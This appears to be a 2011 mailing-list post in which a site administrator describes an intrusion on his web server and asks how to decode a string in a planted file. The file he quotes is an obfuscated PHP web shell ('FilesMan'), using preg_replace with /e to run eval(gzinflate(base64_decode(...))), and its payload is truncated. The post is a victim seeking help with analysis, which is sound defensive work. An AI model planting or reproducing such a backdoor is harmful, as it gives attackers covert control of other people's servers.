OT: Decrypting PHP preg_replace Strings
Sivakatirswami
katir at hindu.org
Sun Dec 25 22:28:24 EST 2011
We have hackers on our web server getting in thru one Domain... I think
there is a whole in WordPress.
Long story... a nuisance, But they are able to write files to locations
out outside the blog directory, insert strings into the first line on
.html files and are cloning our pages and storing them in obscure places
like /var/lib/dovecot/control/theHackedDomain (this directory is deep in
the system but writeable by the user for this domain)
We don't see how they are getting in. They are not able to touch
anything else on the box..
anyway... is there a live code function that can decrypt the string at
the and of this file?
--?php
$auth_pass = "347455f3975a7c84651eb69f10198b09";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9u[snip]
dLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?--
I can't wait until move our site over to RevIgniter; I think it will be
much more secure!
Sivakatirswami
www.himlayanacademy.com
More information about the use-livecode
mailing list